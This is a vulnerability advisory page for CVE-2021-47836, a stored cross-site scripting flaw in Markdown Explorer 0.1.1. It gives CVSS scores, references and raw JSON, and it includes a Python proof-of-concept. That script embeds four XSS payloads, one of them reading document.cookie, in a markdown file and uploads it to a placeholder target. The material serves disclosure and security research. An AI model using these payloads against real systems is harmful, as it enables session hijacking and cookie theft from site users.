Security Vulnerability Report
CVE-2021-47836 CVSS 6.1 MEDIUM

CVE-2021-47836

Published: 2026-01-16 19:16:09
Last Modified: 2026-04-15 00:35:42

Description

Markdown Explorer 0.1.1 contains a cross-site scripting vulnerability that allows attackers to inject malicious code through file uploads and editor inputs. Attackers can upload markdown files with embedded JavaScript payloads to execute remote commands and potentially gain system access.

CVSS Details

CVSS Score: 6.1
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Markdown Explorer 0.1.1
Markdown Explorer <= 0.1.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2021-47836 Markdown Explorer Stored XSS PoC
# This PoC demonstrates how to exploit the stored XSS vulnerability
# in Markdown Explorer 0.1.1

import requests
import json

TARGET_URL = "http://target.com/markdown-explorer"


def create_malicious_markdown():
    """
    Create a malicious markdown file with XSS payload
    """
    # Method 1: Using script tag
    payload1 = """<script>alert(document.cookie)</script>"""

    # Method 2: Using img onerror event
    payload2 = """<img src=x onerror=alert('XSS')>"""

    # Method 3: Using anchor with javascript protocol
    payload3 = """[Click me](javascript:alert('XSS'))"""

    # Method 4: Using event handlers
    payload4 = """<svg/onload=alert(document.domain)>"""

    # Combine payloads into markdown
    malicious_content = f"""# Malicious File

{payload1}

{payload2}

{payload3}

{payload4}

This file contains XSS payloads.
"""
    return malicious_content


def upload_malicious_file():
    """
    Upload the malicious markdown file to the server
    """
    files = {
        'file': ('malicious.md', create_malicious_markdown(), 'text/markdown')
    }

    try:
        response = requests.post(f"{TARGET_URL}/upload", files=files)
        print(f"Upload Response: {response.status_code}")
        print(response.text)
        return response.json()
    except Exception as e:
        print(f"Error uploading file: {e}")
        return None


def main():
    print("=" * 50)
    print("CVE-2021-47836 Exploitation PoC")
    print("=" * 50)

    # Step 1: Create malicious markdown content
    print("\n[1] Creating malicious markdown file...")
    content = create_malicious_markdown()
    print(f"Payload created: {len(content)} bytes")

    # Step 2: Upload the file
    print("\n[2] Uploading malicious file...")
    result = upload_malicious_file()

    if result:
        print("\n[3] File uploaded successfully!")
        print("[!] When any user views this file, the XSS payload will execute")
        print("[!] This can lead to cookie theft, session hijacking, etc.")


if __name__ == "__main__":
    main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2021-47836", "sourceIdentifier": "[email protected]", "published": "2026-01-16T19:16:09.050", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Markdown Explorer 0.1.1 contains a cross-site scripting vulnerability that allows attackers to inject malicious code through file uploads and editor inputs. Attackers can upload markdown files with embedded JavaScript payloads to execute remote commands and potentially gain system access."}, {"lang": "es", "value": "Markdown Explorer 0.1.1 contiene una vulnerabilidad de cross-site scripting que permite a los atacantes inyectar código malicioso a través de cargas de archivos y entradas del editor. Los atacantes pueden cargar archivos markdown con cargas útiles de JavaScript incrustadas para ejecutar comandos remotos y potencialmente obtener acceso al sistema."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", 
"modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://github.com/jersou/markdown-explorer", "source": "[email protected]"}, {"url": "https://imgur.com/a/w4bcPWs", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/49826", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/markdown-explorer-persistent-cross-site-scripting", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/markdown-explorer-persistent-cross-site-scripting", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}